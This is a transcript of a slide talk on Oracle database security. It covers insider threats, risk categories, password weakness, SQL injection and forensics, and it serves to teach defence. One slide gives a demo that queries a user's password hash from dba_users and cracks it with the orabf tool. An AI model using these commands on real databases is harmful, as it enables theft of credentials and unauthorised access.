seducing the pants off oracle
DESCRIPTION
Seducing the pants off Oracle. Gary Myers. The period are is courtesy of http://picasaweb.google.com/silverghost1951. Computers don't " get" threats. AUTHENTICATION vs AUTHORISATION. Passwords = AUTHENTICATION mechanism (who am I) - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/1.jpg)
Seducing the pants off Oracle
Gary Myers
The period are is courtesy of http://picasaweb.google.com/silverghost1951
![Page 2: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/2.jpg)
Computers don't "get" threats
![Page 3: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/3.jpg)
AUTHENTICATION vs AUTHORISATION
• Passwords = AUTHENTICATION mechanism (who am I)
• With the DBA's username and password, I can convince the database I am the DBA
• DBA is typically authorised to do all (or most ) things.
![Page 4: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/4.jpg)
I AM YOUR WORST NIGHTMARE
or at least in your Top Ten
![Page 5: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/5.jpg)
I Am Your Worst Nightmare
• External consultant (or contractor)• Good understanding of Oracle• Follow a lot of the (public) Oracle
security chatter
![Page 6: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/6.jpg)
• Only around for a short period• Next week, I may be working for
your competitor• Next week, I may be unemployed–Motive is often malice or financial gain– Don't rule out sheer incompetence– Financial need often driven by…• Addiction to drugs or alcohol• Gambling debts or expensive women• Sydney house prices
I Am Your Worst Nightmare
![Page 7: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/7.jpg)
I Am Your Worst Nightmare
• I have access to your offices
• I have access to your computers
• I have access to your databases
![Page 8: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/8.jpg)
I Am Your Worst Nightmare• I am a consultant (or contractor)• I have a good understanding of Oracle• I follow a lot of the (public) Oracle security
talk• I may only be around for weeks• I may be working for your competitor next• I may be unemployed next• I have access to your offices• I have access to your computers• I probably have access to your databases
MeansMotive
Opportunity
![Page 9: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/9.jpg)
RISK ASSESSMENT
Fall or be shot ?
![Page 10: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/10.jpg)
It's All About Risks• Denial of Service• Unauthorized reads• Unauthorized writes• Unauthorized use• Gateway to the Great Beyond
• Falling from buildings or being shot - not so much
![Page 11: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/11.jpg)
DENIAL OF SERVICE
Your ride ends now...
![Page 12: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/12.jpg)
Denial of Service• Crash the database (or
listener)• Catastrophic data loss• Catastrophic data corruption• Standard DR recovery• Beware : Attack may be
repeated
![Page 13: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/13.jpg)
UNAUTHORISED READS
No peeking
![Page 14: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/14.jpg)
Unauthorised ReadsSomeone sees something they
shouldn't–Backups–Redo / Undo files–Trace files, dumps and exports–Data in transit (client to/from
server)–Operating System (memory) –Development and test databases
![Page 15: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/15.jpg)
Unauthorised Reads• Internal info (eg DBA_USERS)• Inference–Clues about data
![Page 16: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/16.jpg)
Unauthorised Reads• Don't store data you don't need• Don't store a value where a hash
will do (eg passwords)• Encrypt personal information• Encrypt financial information• Limit 'back door' access (TDE)• Individual Authentication• Regularly review authorisations• Audit
![Page 17: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/17.jpg)
Unauthorised ReadsAround a quarter of staff would steal information such as customer lists when they moved employmentTheRegister, 19th August 2010
![Page 18: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/18.jpg)
UNAUTHORISED WRITES
Destroying the evidence
![Page 19: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/19.jpg)
Unauthorised Writes• Insert, Update or Deletion of data–Could be 'regular' data–Could be 'tidying away' evidence
(audit trail)–Could be data dictionary (rootkit)
• Audit (to OS, not DB)• Checksum packages, files…
![Page 20: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/20.jpg)
UNAUTHORISED USE
No personal calls !
![Page 21: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/21.jpg)
Unauthorised UseUsing the database without
permission–Illegal / illicit•PCI
–In excess of licensed functionality•Contractors / Consultants
–Storing private data on the disks •Cloud
![Page 22: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/22.jpg)
ESCAPING THE DATABASE
Out of the frying pan
![Page 23: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/23.jpg)
Escaping The Database• Use dev / test to get to Prod• Use DR to get to Prod• Use database to get to OS• Use DB server to get to other
local machines• Use DB server to get to
remote machines (HTTP etc)• Use db password for other apps
![Page 24: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/24.jpg)
PASSWORDS
![Page 25: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/25.jpg)
Password security• Hashes = passwords• Crack a million passwords /
second• Seven character passwords -
Trivial• Eight alphabetic character
passwords - Trivial• Eight character passwords plus a
'1' on the end - Trivial• Password fuzzers and Rainbow
tables
![Page 26: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/26.jpg)
Password Demo• Create fresh user in SQL Plus• Set a reasonable password – Not TIGER or MANAGER– Something that you'd remember though
• See whether ORABF will crack it• select 'orabf '||password||':'||username
from dba_users where username='GARY';• cd C:\Documents and Settings\All Users\
Documents \Common\orabf-v0.7.6• orabf 9F868BD4F05CEE80:GARY -c pass_uniq.txt
![Page 27: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/27.jpg)
I AM YOUR WORST NIGHTMARE
…and I cheat
![Page 28: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/28.jpg)
WRAPPING
The truth is in here
![Page 29: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/29.jpg)
Wrapped Packages• (Python) code for unwrapping
10g+ PL/SQL is on the web• Oracle CPU release : Changed
packages WILL be unwrapped and compared to the 'old' version• Shows vulnerabilities in old code• CPUs make vulnerabilities
public !
![Page 30: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/30.jpg)
INJECTION EXPLOITS
![Page 31: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/31.jpg)
Exploits• No benefit in discussing specifics• Don't know any current 0-day
ones• Others fixed by CPUs• What would you do with the
information anyway ?• Hedgehog Sentrigo ?
![Page 32: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/32.jpg)
SQL Injection• SQL injection is one of the
major categories of computer vulnerability• Typically poorly designed web
applications• Publically available tools that try
to penetrate web-sites by crafting URLS.
![Page 33: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/33.jpg)
SQL (and PL/SQL) Injection
• Typically AUTHORISATION attacks
• Convince the database that you are authorised to perform the action
• Bypass any rules saying NO !
![Page 34: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/34.jpg)
Standard Packages• Vulnerabilities in supplied
packages often allow for privilege escalation• Accounts like MDSYS have
CREATE ANY TRIGGER privilege• Can be abused even if account
is locked.
![Page 35: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/35.jpg)
Corkscrew ThinkingMultiple steps to get around multiple barriers
![Page 36: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/36.jpg)
AUDIT AND FORENSICS
Caught in the act… or afterwards
![Page 37: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/37.jpg)
Forensics• Database log file• Web / application server log files • Audit to an Operating System file• FTP the file(s) somewhere safe• Log Miner• DDL triggers• Block dumps, AWR, ORA_ROWSCN…
![Page 38: Seducing the pants off Oracle](https://reader036.vdocuments.net/reader036/viewer/2022081421/568165f9550346895dd9270a/html5/thumbnails/38.jpg)
Useful References• Pete Finnegan – www.petefinnigan.com
• Alex Kornburst – blog.red-database-security.com
• David Litchfield– Hackers Handbooks (Database / Oracle)